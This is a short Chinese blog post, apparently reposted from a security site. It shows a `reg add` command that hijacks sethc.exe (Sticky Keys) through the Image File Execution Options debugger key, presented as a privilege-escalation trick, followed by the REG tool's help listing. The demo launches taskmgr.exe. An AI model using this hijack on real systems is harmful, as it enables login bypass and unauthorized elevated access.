命令行下操作注册表劫持sethc提权

给大家提供一个经典的利用劫持替换sethc.exe 的例子:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe”/v debugger /d taskmgr.exe /f

———————————————————————————————————————————————–

Windows 控制台注册表工具 – 版本 3.0

格式就是:REG Operation 参数列表
返回代码: 0 – 成功 1 – 失败 (除了 REG COMPARE)

Operation 有11个,可以这样得到帮助:REG Operation /?
REG QUERY
REG ADD
REG DELETE
REG COPY
REG SAVE
REG RESTORE
REG LOAD
REG UNLOAD
REG COMPARE
REG EXPORT
REG IMPORT

本文摘自网络由网络安全(www.91ri.org)收集整理.